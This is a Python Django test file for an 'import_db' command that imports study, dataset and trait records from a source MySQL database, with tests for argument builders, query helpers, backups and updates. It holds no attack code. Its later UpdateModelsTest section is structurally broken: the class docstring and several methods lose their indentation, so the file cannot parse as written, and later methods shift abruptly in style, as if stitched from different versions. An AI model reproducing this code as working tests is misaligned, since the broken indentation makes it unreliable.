        """A Study can be created from the args made from a row of test data."""
        study_query = 'SELECT * FROM study;'
        self.cursor.execute(study_query)
        row_dict = self.cursor.fetchone()
        # Have to make a models.GlobalStudy first.
        global_study = factories.GlobalStudyFactory.create(i_id=row_dict['global_study_id'])
        field_types = {el[0]: el[1] for el in self.cursor.description}
        study_args = CMD._make_study_args(CMD._fix_row(row_dict, field_types))
        study = models.Study(**study_args)
        study.save()
        self.assertIsInstance(study, models.Study)
    def test_make_source_study_version_args_one_row_make_source_study_version_obj(self):
        """A SourceStudyVersion can be created from the args made from a row of test data."""
        source_study_version_query = 'SELECT * FROM source_study_version;'
        self.cursor.execute(source_study_version_query)
        row_dict = self.cursor.fetchone()
        # Have to make global study and study first.
        global_study = factories.GlobalStudyFactory.create(i_id=1)
        study = factories.StudyFactory.create(i_accession=row_dict['accession'], global_study=global_study)
        field_types = {el[0]: el[1] for el in self.cursor.description}
        source_study_version_args = CMD._make_source_study_version_args(CMD._fix_row(row_dict, field_types))
        source_study_version = models.SourceStudyVersion(**source_study_version_args)
        source_study_version.save()
        self.assertIsInstance(source_study_version, models.SourceStudyVersion)
    def test_make_subcohort_args_one_row_make_subcohort_obj(self):
        """A Subcohort can be created from the args made from a row of test data."""
        subcohort_query = 'SELECT * FROM subcohort;'
        self.cursor.execute(subcohort_query)
        row_dict = self.cursor.fetchone()
        # Have to make a models.GlobalStudy first.
        global_study = factories.GlobalStudyFactory.create(i_id=row_dict['global_study_id'])
        field_types = {el[0]: el[1] for el in self.cursor.description}
        subcohort_args = CMD._make_subcohort_args(CMD._fix_row(row_dict, field_types))
        subcohort = models.Subcohort(**subcohort_args)
        subcohort.save()
        self.assertIsInstance(subcohort, models.Subcohort)
    def test_make_source_dataset_args_one_row_make_source_dataset_obj(self):
        """A SourceDataset can be created from the args made from a row of test data."""
        source_dataset_query = 'SELECT * FROM source_dataset;'
        self.cursor.execute(source_dataset_query)
        row_dict = self.cursor.fetchone()
        # Have to make global study, study, and source_study_version first.
        global_study = factories.GlobalStudyFactory.create(i_id=1)
        study = factories.StudyFactory.create(i_accession=1, global_study=global_study)
        source_study_version = factories.SourceStudyVersionFactory.create(
            i_id=row_dict['study_version_id'], study=study)
        field_types = {el[0]: el[1] for el in self.cursor.description}
        source_dataset_args = CMD._make_source_dataset_args(CMD._fix_row(row_dict, field_types))
        source_dataset = models.SourceDataset(**source_dataset_args)
        source_dataset.save()
        self.assertIsInstance(source_dataset, models.SourceDataset)
    def test_make_harmonized_trait_set_args_one_row_make_harmonized_trait_set_obj(self):
        """A HarmonizedTraitSet can be created from the args made from a row of test data."""
        harmonized_trait_set_query = 'SELECT * FROM harmonized_trait_set;'
        self.cursor.execute(harmonized_trait_set_query)
        row_dict = self.cursor.fetchone()
        field_types = {el[0]: el[1] for el in self.cursor.description}
        harmonized_trait_set_args = CMD._make_harmonized_trait_set_args(CMD._fix_row(row_dict, field_types))
        harmonized_trait_set = models.HarmonizedTraitSet(**harmonized_trait_set_args)
        harmonized_trait_set.save()
        self.assertIsInstance(harmonized_trait_set, models.HarmonizedTraitSet)
    def test_make_allowed_update_reason_args_one_row_make_allowed_update_reason_obj(self):
        """An AllowedUpdateReason can be created from the args made from a row of test data."""
        allowed_update_reason_query = 'SELECT * FROM allowed_update_reason;'
        self.cursor.execute(allowed_update_reason_query)
        row_dict = self.cursor.fetchone()
        field_types = {el[0]: el[1] for el in self.cursor.description}
        allowed_update_reason_args = CMD._make_allowed_update_reason_args(CMD._fix_row(row_dict, field_types))
        allowed_update_reason = models.AllowedUpdateReason(**allowed_update_reason_args)
        allowed_update_reason.save()
        self.assertIsInstance(allowed_update_reason, models.AllowedUpdateReason)
    def test_make_harmonized_trait_set_version_args_one_row_make_harmonized_trait_set_version_obj(self):
        """A HarmonizedTraitSetVersion can be created from the args made from a row of test data."""
        harmonized_trait_set_version_query = 'SELECT * FROM harmonized_trait_set_version;'
        self.cursor.execute(harmonized_trait_set_version_query)
        row_dict = self.cursor.fetchone()
        # Have to make a HarmonizedTraitSet first.
        harmonized_trait_set = factories.HarmonizedTraitSetFactory.create(i_id=row_dict['harmonized_trait_set_id'])
        field_types = {el[0]: el[1] for el in self.cursor.description}
        harmonized_trait_set_version_args = CMD._make_harmonized_trait_set_version_args(
            CMD._fix_row(row_dict, field_types))
        harmonized_trait_set_version = models.HarmonizedTraitSetVersion(**harmonized_trait_set_version_args)
        harmonized_trait_set_version.save()
        self.assertIsInstance(harmonized_trait_set_version, models.HarmonizedTraitSetVersion)
    def test_make_source_trait_args_one_row_make_source_trait_obj(self):
        """A SourceTrait can be created from the args made from a row of test data."""
        source_trait_query = 'SELECT * FROM source_trait;'
        self.cursor.execute(source_trait_query)
        row_dict = self.cursor.fetchone()
        # Have to make global study, study, source_study_version, and source_dataset first.
        global_study = factories.GlobalStudyFactory.create(i_id=1)
        study = factories.StudyFactory.create(i_accession=1, global_study=global_study)
        source_study_version = factories.SourceStudyVersionFactory.create(i_id=1, study=study)
        source_dataset = factories.SourceDatasetFactory.create(
            i_id=row_dict['dataset_id'], source_study_version=source_study_version)
        field_types = {el[0]: el[1] for el in self.cursor.description}
        source_trait_args = CMD._make_source_trait_args(CMD._fix_row(row_dict, field_types))
        source_trait = models.SourceTrait(**source_trait_args)
        source_trait.save()
        self.assertIsInstance(source_trait, models.SourceTrait)
    def test_make_harmonized_trait_args_one_row_make_harmonized_trait_obj(self):
        """A HarmonizedTrait can be created from the args made from a row of test data."""
        harmonized_trait_query = 'SELECT * FROM harmonized_trait;'
        self.cursor.execute(harmonized_trait_query)
        row_dict = self.cursor.fetchone()
        # Have to make harmonized_trait_set first.
        harmonized_trait_set_version = factories.HarmonizedTraitSetVersionFactory.create(
            i_id=row_dict['harmonized_trait_set_version_id'])
        field_types = {el[0]: el[1] for el in self.cursor.description}
        harmonized_trait_args = CMD._make_harmonized_trait_args(CMD._fix_row(row_dict, field_types))
        harmonized_trait = models.HarmonizedTrait(**harmonized_trait_args)
        harmonized_trait.save()
        self.assertIsInstance(harmonized_trait, models.HarmonizedTrait)
    def test_make_source_trait_encoded_value_args_one_row_make_source_trait_encoded_value_obj(self):
        """A SourceTraitEncodedValue can be created from the args made from a row of test data."""
        source_trait_encoded_value_query = 'SELECT * FROM source_trait_encoded_values;'
        self.cursor.execute(source_trait_encoded_value_query)
        row_dict = self.cursor.fetchone()
        # Have to make global study, study, source_study_version, source_dataset, and source_trait first.
        global_study = factories.GlobalStudyFactory.create(i_id=1)
        study = factories.StudyFactory.create(i_accession=1, global_study=global_study)
        source_study_version = factories.SourceStudyVersionFactory.create(i_id=1, study=study)
        source_dataset = factories.SourceDatasetFactory.create(i_id=1, source_study_version=source_study_version)
        source_trait = factories.SourceTraitFactory.create(
            i_trait_id=row_dict['source_trait_id'], source_dataset=source_dataset)
        field_types = {el[0]: el[1] for el in self.cursor.description}
        fixed_row = CMD._fix_row(row_dict, field_types)
        source_trait_encoded_value_args = CMD._make_source_trait_encoded_value_args(fixed_row)
        source_trait_encoded_value = models.SourceTraitEncodedValue(**source_trait_encoded_value_args)
        source_trait_encoded_value.save()
        self.assertIsInstance(source_trait_encoded_value, models.SourceTraitEncodedValue)
    def test_make_harmonized_trait_encoded_value_args_one_row_make_harmonized_trait_encoded_value_obj(self):
        """A HarmonizedTraitEncodedValue can be created from the args made from a row of test data."""
        # Get a single harmonized_trait_encoded_value from the source db
        harmonized_trait_encoded_value_query = 'SELECT * FROM harmonized_trait_encoded_values;'
        self.cursor.execute(harmonized_trait_encoded_value_query)
        row_dict = self.cursor.fetchone()
        # Get information for the harmonized_trait the encoded value is connected to.
        harmonized_trait_query = 'SELECT * FROM harmonized_trait WHERE harmonized_trait_id = {};'.format(
            row_dict['harmonized_trait_id'])
        self.cursor.execute(harmonized_trait_query)
        harmonized_trait_row_dict = self.cursor.fetchone()
        # Make a harmonized_trait and harmonized_trait_set before trying to make the encoded value object.
        harmonized_trait = factories.HarmonizedTraitFactory.create(
            i_trait_id=row_dict['harmonized_trait_id'],
            harmonized_trait_set_version__i_id=harmonized_trait_row_dict['harmonized_trait_set_version_id'])
        # Make the encoded value object.
        field_types = {el[0]: el[1] for el in self.cursor.description}
        fixed_row = CMD._fix_row(row_dict, field_types)
        harmonized_trait_encoded_value_args = CMD._make_harmonized_trait_encoded_value_args(fixed_row)
        harmonized_trait_encoded_value = models.HarmonizedTraitEncodedValue(**harmonized_trait_encoded_value_args)
        harmonized_trait_encoded_value.save()
        self.assertIsInstance(harmonized_trait_encoded_value, models.HarmonizedTraitEncodedValue)
class HelperTest(BaseTestDataTestCase):
    """Tests of the helper functions from import_db.Command()."""

    def test_make_table_query(self):
        """Makes a valid query with no filtering."""
        query = CMD._make_table_query(source_table='study')
        self.cursor.execute(query)
        self.assertIsNotNone(self.cursor.fetchone())

    def test_make_table_query_with_filter(self):
        """Makes a valid query when filtering on specific values."""
        query = CMD._make_table_query(
            source_table='study', filter_field='accession', filter_values=['286'], filter_not=False)
        self.cursor.execute(query)
        self.assertIsNotNone(self.cursor.fetchone())

    def test_make_table_query_with_not_filter(self):
        """Makes a valid query when excluding specific values."""
        query = CMD._make_table_query(
            source_table='study', filter_field='accession', filter_values=['286'], filter_not=True)
        self.cursor.execute(query)
        self.assertIsNotNone(self.cursor.fetchone())

    def test_make_table_query_filter_values_empty(self):
        """Makes a valid query when filter_values is empty."""
        query = CMD._make_table_query(
            source_table='study', filter_field='accession', filter_values=[], filter_not=False)
        self.cursor.execute(query)
        # An empty include-filter should match no rows at all.
        self.assertIsNone(self.cursor.fetchone())

    def test_make_global_study_from_args(self):
        """_make_model_object_from_args works to make a global study."""
        CMD._make_model_object_from_args(
            model_args={'i_id': 5, 'i_name': 'global study name', 'i_date_added': timezone.now(),
                        'i_date_changed': timezone.now()},
            model=models.GlobalStudy)
        obj = models.GlobalStudy.objects.get(pk=5)
        self.assertIsInstance(obj, models.GlobalStudy)

    def test_make_model_object_per_query_row_global_study(self):
        """Makes a study object for every row in a query result."""
        # Test with global_study because it is not dependent on any other models.
        query = 'SELECT * FROM global_study'
        CMD._make_model_object_per_query_row(
            source_db=self.source_db, query=query, make_args=CMD._make_global_study_args,
            model=models.GlobalStudy)
        self.cursor.execute(query)
        ids = [row['id'] for row in self.cursor.fetchall()]
        imported_ids = [gs.i_id for gs in models.GlobalStudy.objects.all()]
        self.assertEqual(sorted(ids), sorted(imported_ids))

    def test_make_query_for_new_rows(self):
        """Makes a query that properly returns new rows of data from the study table."""
        self.cursor.execute('SELECT * FROM study')
        all_accessions = [row['accession'] for row in self.cursor.fetchall()]
        # Pretend the first accession was already imported.
        old_pks = all_accessions[0:1]
        query = CMD._make_query_for_new_rows('study', 'accession', [str(el) for el in old_pks])
        self.cursor.execute(query)
        retrieved_accessions = [row['accession'] for row in self.cursor.fetchall()]
        # Already-imported rows must be excluded; all other rows must be returned.
        for phs in all_accessions:
            if phs in old_pks:
                self.assertNotIn(phs, retrieved_accessions)
            else:
                self.assertIn(phs, retrieved_accessions)

    # def test_make_args_mapping(self):
    # Testing this function generically is not worth it, since it's already
    # tested specifically multiple times in the MakeArgsTestCase

    def test_import_new_data_global_study(self):
        """Imports data from the global_study correctly into the models.GlobalStudy model."""
        CMD._import_new_data(source_db=self.source_db,
                             source_table='global_study',
                             source_pk='id',
                             model=models.GlobalStudy,
                             make_args=CMD._make_global_study_args)
        self.cursor.execute('SELECT * FROM global_study')
        pks_in_db = [row['id'] for row in self.cursor.fetchall()]
        imported_pks = [gs.pk for gs in models.GlobalStudy.objects.all()]
        self.assertEqual(pks_in_db, imported_pks)

    def test_make_query_for_rows_to_update_global_study(self):
        """Returns a query that contains only the updated rows."""
        user = UserFactory.create()
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        # Data about how to make the update in the source db.
        model = models.GlobalStudy
        model_instance = model.objects.all()[0]
        source_db_table_name = 'global_study'
        field_to_update = 'name'
        new_value = 'asdfghjkl'
        # The source db pk column name matches the model pk name minus the 'i_' prefix.
        source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
        # Make the update in the source db.
        old_pks = CMD._get_current_pks(models.GlobalStudy)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        # Make the query.
        self.source_db = get_devel_db()
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        updated_query = CMD._make_query_for_rows_to_update(
            source_db_table_name, model, old_pks, source_db_pk_name, changed_greater=True)
        self.cursor.execute(updated_query)
        updates = self.cursor.fetchall()
        # Only the single row that was changed should be returned.
        self.assertEqual(len(updates), 1)
        field_types = {el[0]: el[1] for el in self.cursor.description}
        updated_row = CMD._fix_row(updates[0], field_types)
        self.assertEqual(updated_row[field_to_update], new_value)
        self.assertEqual(updated_row[source_db_pk_name], model_instance.pk)

    def test_update_model_object_from_args_global_study(self):
        """Makes updates to a global study from model_args dict."""
        global_study = factories.GlobalStudyFactory.create()
        new_name = global_study.i_name + '_modified'
        model_args = {'i_id': global_study.pk, 'i_name': new_name}
        CMD._update_model_object_from_args(model_args, models.GlobalStudy, expected=True)
        global_study.refresh_from_db()
        self.assertEqual(global_study.i_name, new_name)

    # def test_update_model_object_per_query_row(self):
    # A test of this function would be almost exactly like the tests in the
    # UpdateModelsTestCase, so I'm not writing another one here...

    def test_update_existing_data_global_study(self):
        """Updates in global_study are imported."""
        # Have to clean and reload the db because of updates in previous tests.
        clean_devel_db()
        load_test_source_db_data('base.sql')
        user = UserFactory.create()
        management.call_command('import_db', '--devel_db', '--no_backup',
                                '--taggedtrait_creator={}'.format(user.email))
        # Close the db connections because change_data_in_table() opens new connections.
        # This does not affect the .cursor and .source_db attributes in other functions.
        self.cursor.close()
        self.source_db.close()
        # Change the data in the source db.
        model = models.GlobalStudy
        model_instance = model.objects.all()[0]
        old_mod_time = model_instance.modified
        source_db_table_name = 'global_study'
        field_to_update = 'name'
        new_value = 'asdfghjkl'
        source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
        # Sleep so the change timestamp in the source db is measurably later.
        sleep(1)
        change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
        # Need to open the db and cursor again...
        self.source_db = get_devel_db()
        self.cursor = self.source_db.cursor(buffered=True, dictionary=True)
        # This update is not technically expected, but get rid of the warning.
        CMD._update_existing_data(
            source_db=self.source_db, source_table='global_study', source_pk='id', model=models.GlobalStudy,
            make_args=CMD._make_global_study_args, expected=True)
        # Check that modified date > created date, and name is set to new value.
        model_instance.refresh_from_db()
        self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
        self.assertGreater(model_instance.modified, old_mod_time)
class BackupTest(TransactionTestCase):
    """Tests to make sure backing up the Django db in handle() is working right."""

    @classmethod
    def setUpClass(cls):
        """Load the base test data, once for all tests."""
        # Run the TestCase setUpClass method.
        super().setUpClass()
        # Clean out the devel db and load the first test dataset.
        # By default, all tests will use dataset 1.
        clean_devel_db()
        load_test_source_db_data('base.sql')
        # Can't create a test user here because of TransactionTestCase.

    def setUp(self):
        """Create a fresh test user for each test."""
        super().setUp()
        self.user = UserFactory.create()

    def test_backup_is_created(self):
        """Backup dump file is created in the expected directory."""
        set_backup_dir()
        # Import data from the source db.
        management.call_command('import_db', '--devel_db',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Does the backup dir exist?
        self.assertTrue(exists(settings.DBBACKUP_STORAGE_OPTIONS['location']))
        # Is there a single compressed dump file in there?
        backup_files = listdir(settings.DBBACKUP_STORAGE_OPTIONS['location'])
        self.assertEqual(len(backup_files), 1)
        self.assertTrue(backup_files[0].endswith('.dump.gz'))
        # Is it a reasonable size that would indicate it's not empty?
        file_size = stat(join(settings.DBBACKUP_STORAGE_OPTIONS['location'], backup_files[0])).st_size
        self.assertTrue(1000000000 > file_size > 100)
        cleanup_backup_dir()

    def test_backup_can_be_restored(self):
        """A saved backup can be used to restore the db to its previous state."""
        # TODO: Couldn't get the dbrestore command to work, so leaving this for later.
        # Report an explicit skip instead of silently passing an unimplemented test.
        self.skipTest('dbrestore command does not work yet; test body below is an outline.')
        set_backup_dir()
        # Import data from the source db.
        management.call_command('import_db', '--devel_db',
                                '--taggedtrait_creator={}'.format(self.user.email))
        # Restore from the backup file.
        # Make a new backup file after the restore.
        # Is the contents of the new backup the same as the old?
        cleanup_backup_dir()
class SpecialQueryTest(BaseTestDataTestCase):
    """Test the special queries saved as constant variables in import_db."""

    def test_HUNIT_QUERY(self):
        """HUNIT_QUERY returns good results."""
        self.cursor.execute(HUNIT_QUERY)
        results = self.cursor.fetchall()
        self.assertIn('harmonized_trait_id', results[0].keys())
        self.assertIn('harmonization_unit_id', results[0].keys())
        self.assertEqual(len(results), 11)  # Change if changing test data.

    def test_HUNIT_QUERY_while_locked(self):
        """HUNIT_QUERY can still be run when db is locked."""
        # Replicates this error from making new_harmonization_unit_harmonized_trait_links in _import_harmonized_tables:
        # mysql.connector.errors.DatabaseError: 1100 (HY000): Table 'comp_source' was not locked with LOCK TABLES
        CMD._lock_source_db(self.source_db)
        try:
            self.cursor.execute(HUNIT_QUERY)
            results = self.cursor.fetchall()
            self.assertIn('harmonized_trait_id', results[0].keys())
            self.assertIn('harmonization_unit_id', results[0].keys())
            self.assertEqual(len(results), 11)  # Change if changing test data.
        finally:
            # Always unlock so a failed assertion doesn't leave the source db locked for later tests.
            CMD._unlock_source_db(self.source_db)
class UpdateModelsTest(ClearSearchIndexMixin, BaseTestDataTestCase):
"""Tests of the update functions with updates to each possible source_db table."""
    @classmethod
    def setUpClass(cls):
        """Create a user once for all tests, to pass as the taggedtrait creator to import_db."""
        super().setUpClass()
        cls.user = UserFactory.create()
# Source trait updates.
def test_update_global_study(self):
"""Updates in global_study are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.GlobalStudy
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'global_study'
field_to_update = 'name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_study(self):
"""Updates in study are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.Study
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'study'
field_to_update = 'study_name'
new_value = 'asdfghjkl'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_source_study_version(self):
"""Updates in source_study_version are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.SourceStudyVersion
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'source_study_version'
field_to_update = 'is_deprecated'
new_value = int(not getattr(model_instance, 'i_' + field_to_update))
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_source_dataset(self):
"""Updates in source_dataset table are imported."""
management.call_command('import_db', '--devel_db', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
# Close the db connections because change_data_in_table() opens new connections.
# This does not affect the .cursor and .source_db attributes in other functions.
self.cursor.close()
self.source_db.close()
model = models.SourceDataset
model_instance = model.objects.all()[0]
old_mod_time = model_instance.modified
source_db_table_name = 'source_dataset'
field_to_update = 'dbgap_description'
new_value = 'asdgsdfg'
source_db_pk_name = model_instance._meta.pk.name.replace('i_', '')
sleep(1)
change_data_in_table(source_db_table_name, field_to_update, new_value, source_db_pk_name, model_instance.pk)
management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
'--taggedtrait_creator={}'.format(self.user.email))
model_instance.refresh_from_db()
# Check that modified date > created date, and name is set to new value.
self.assertEqual(new_value, getattr(model_instance, 'i_' + field_to_update))
self.assertTrue(model_instance.modified > old_mod_time)
def test_update_subcohort(self):
    """Updates in subcohort are imported."""
    management.call_command('import_db', '--devel_db', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    # change_data_in_table() opens its own connections, so close ours first.
    # The .cursor and .source_db attributes used by other functions are unaffected.
    self.cursor.close()
    self.source_db.close()
    subcohort = models.Subcohort.objects.all()[0]
    previous_modified = subcohort.modified
    pk_column = subcohort._meta.pk.name.replace('i_', '')
    sleep(1)  # guarantee a re-imported modified timestamp would be strictly later
    change_data_in_table('subcohort', 'name', 'asdfghjkl', pk_column, subcohort.pk)
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    subcohort.refresh_from_db()
    # The changed name should be imported and the modified timestamp bumped.
    self.assertEqual('asdfghjkl', subcohort.i_name)
    self.assertTrue(subcohort.modified > previous_modified)
def test_update_source_trait(self):
    """Updates in source_trait table are imported and the search index is updated."""
    management.call_command('import_db', '--devel_db', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    # change_data_in_table() opens its own connections, so close ours first.
    # The .cursor and .source_db attributes used by other functions are unaffected.
    self.cursor.close()
    self.source_db.close()
    trait = models.SourceTrait.objects.all().current()[0]
    previous_modified = trait.modified
    sleep(1)  # guarantee a re-imported modified timestamp would be strictly later
    # The source db column is dbgap_description; the Django field is i_description.
    change_data_in_table('source_trait', 'dbgap_description', 'asdfghjkl', 'source_trait_id', trait.pk)
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    trait.refresh_from_db()
    # The changed description should be imported and the modified timestamp bumped.
    self.assertEqual('asdfghjkl', trait.i_description)
    self.assertTrue(trait.modified > previous_modified)
    # The trait should be findable in the search index by its new description.
    self.assertQuerysetEqual(watson.filter(models.SourceTrait, 'asdfghjkl'), [repr(trait)])
def test_update_source_trait_encoded_value(self):
    """Updates in source_trait_encoded_values are imported."""
    management.call_command('import_db', '--devel_db', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    # change_data_in_table() opens its own connections, so close ours first.
    # The .cursor and .source_db attributes used by other functions are unaffected.
    self.cursor.close()
    self.source_db.close()
    encoded_value = models.SourceTraitEncodedValue.objects.all()[0]
    previous_modified = encoded_value.modified
    pk_column = encoded_value._meta.pk.name.replace('i_', '')
    sleep(1)  # guarantee a re-imported modified timestamp would be strictly later
    change_data_in_table('source_trait_encoded_values', 'value', 'asdfghjkl', pk_column, encoded_value.pk)
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    encoded_value.refresh_from_db()
    # The changed value should be imported and the modified timestamp bumped.
    self.assertEqual('asdfghjkl', encoded_value.i_value)
    self.assertTrue(encoded_value.modified > previous_modified)
# Harmonized trait updates.
def test_update_harmonized_trait_set(self):
    """Updates to harmonized_trait_set are imported."""
    management.call_command('import_db', '--devel_db', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    # change_data_in_table() opens its own connections, so close ours first.
    # The .cursor and .source_db attributes used by other functions are unaffected.
    self.cursor.close()
    self.source_db.close()
    trait_set = models.HarmonizedTraitSet.objects.all()[0]
    previous_modified = trait_set.modified
    pk_column = trait_set._meta.pk.name.replace('i_', '')
    sleep(1)  # guarantee a re-imported modified timestamp would be strictly later
    change_data_in_table('harmonized_trait_set', 'trait_set_name', 'asdfghjkl', pk_column, trait_set.pk)
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    trait_set.refresh_from_db()
    # The changed name should be imported and the modified timestamp bumped.
    self.assertEqual('asdfghjkl', trait_set.i_trait_set_name)
    self.assertTrue(trait_set.modified > previous_modified)
def test_update_harmonized_trait_set_version(self):
    """Updates to harmonized_trait_set_version are imported."""
    management.call_command('import_db', '--devel_db', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    # change_data_in_table() opens its own connections, so close ours first.
    # The .cursor and .source_db attributes used by other functions are unaffected.
    self.cursor.close()
    self.source_db.close()
    hts_version = models.HarmonizedTraitSetVersion.objects.all()[0]
    previous_modified = hts_version.modified
    pk_column = hts_version._meta.pk.name.replace('i_', '')
    sleep(1)  # guarantee a re-imported modified timestamp would be strictly later
    change_data_in_table('harmonized_trait_set_version', 'harmonized_by', 'asdfghjkl', pk_column, hts_version.pk)
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    hts_version.refresh_from_db()
    # The changed value should be imported and the modified timestamp bumped.
    self.assertEqual('asdfghjkl', hts_version.i_harmonized_by)
    self.assertTrue(hts_version.modified > previous_modified)
def test_update_allowed_update_reason(self):
    """Updates to allowed_update_reason are NOT imported."""
    management.call_command('import_db', '--devel_db', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    # change_data_in_table() opens its own connections, so close ours first.
    # The .cursor and .source_db attributes used by other functions are unaffected.
    self.cursor.close()
    self.source_db.close()
    reason = models.AllowedUpdateReason.objects.all()[0]
    pk_column = reason._meta.pk.name.replace('i_', '')
    sleep(1)
    change_data_in_table('allowed_update_reason', 'description', 'asdfghjkl', pk_column, reason.pk)
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    reason.refresh_from_db()
    # This table's updates are not imported, so the changed value must not appear.
    self.assertNotEqual('asdfghjkl', reason.i_description)
def test_update_harmonization_unit(self):
    """Updates to harmonization_unit are imported."""
    management.call_command('import_db', '--devel_db', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    # change_data_in_table() opens its own connections, so close ours first.
    # The .cursor and .source_db attributes used by other functions are unaffected.
    self.cursor.close()
    self.source_db.close()
    hunit = models.HarmonizationUnit.objects.all()[0]
    previous_modified = hunit.modified
    sleep(1)  # guarantee a re-imported modified timestamp would be strictly later
    change_data_in_table('harmonization_unit', 'tag', 'asdfghjkl', 'id', hunit.pk)
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    hunit.refresh_from_db()
    # The changed tag should be imported and the modified timestamp bumped.
    self.assertEqual('asdfghjkl', hunit.i_tag)
    self.assertTrue(hunit.modified > previous_modified)
def test_update_harmonized_trait(self):
    """Updates to harmonized_trait are imported."""
    management.call_command('import_db', '--devel_db', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    # change_data_in_table() opens its own connections, so close ours first.
    # The .cursor and .source_db attributes used by other functions are unaffected.
    self.cursor.close()
    self.source_db.close()
    htrait = models.HarmonizedTrait.objects.all()[0]
    previous_modified = htrait.modified
    sleep(1)  # guarantee a re-imported modified timestamp would be strictly later
    change_data_in_table('harmonized_trait', 'description', 'asdfghjkl', 'harmonized_trait_id', htrait.pk)
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    htrait.refresh_from_db()
    # The changed description should be imported and the modified timestamp bumped.
    self.assertEqual('asdfghjkl', htrait.i_description)
    self.assertTrue(htrait.modified > previous_modified)
def test_update_harmonized_trait_encoded_value(self):
    """Updates to harmonized_trait_encoded_values are imported."""
    management.call_command('import_db', '--devel_db', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    # change_data_in_table() opens its own connections, so close ours first.
    # The .cursor and .source_db attributes used by other functions are unaffected.
    self.cursor.close()
    self.source_db.close()
    encoded_value = models.HarmonizedTraitEncodedValue.objects.all()[0]
    previous_modified = encoded_value.modified
    pk_column = encoded_value._meta.pk.name.replace('i_', '')
    sleep(1)  # guarantee a re-imported modified timestamp would be strictly later
    change_data_in_table('harmonized_trait_encoded_values', 'value', 'asdfghjkl', pk_column, encoded_value.pk)
    management.call_command('import_db', '--devel_db', '--update_only', '--verbosity=0', '--no_backup',
                            f'--taggedtrait_creator={self.user.email}')
    encoded_value.refresh_from_db()
    # The changed value should be imported and the modified timestamp bumped.
    self.assertEqual('asdfghjkl', encoded_value.i_value)
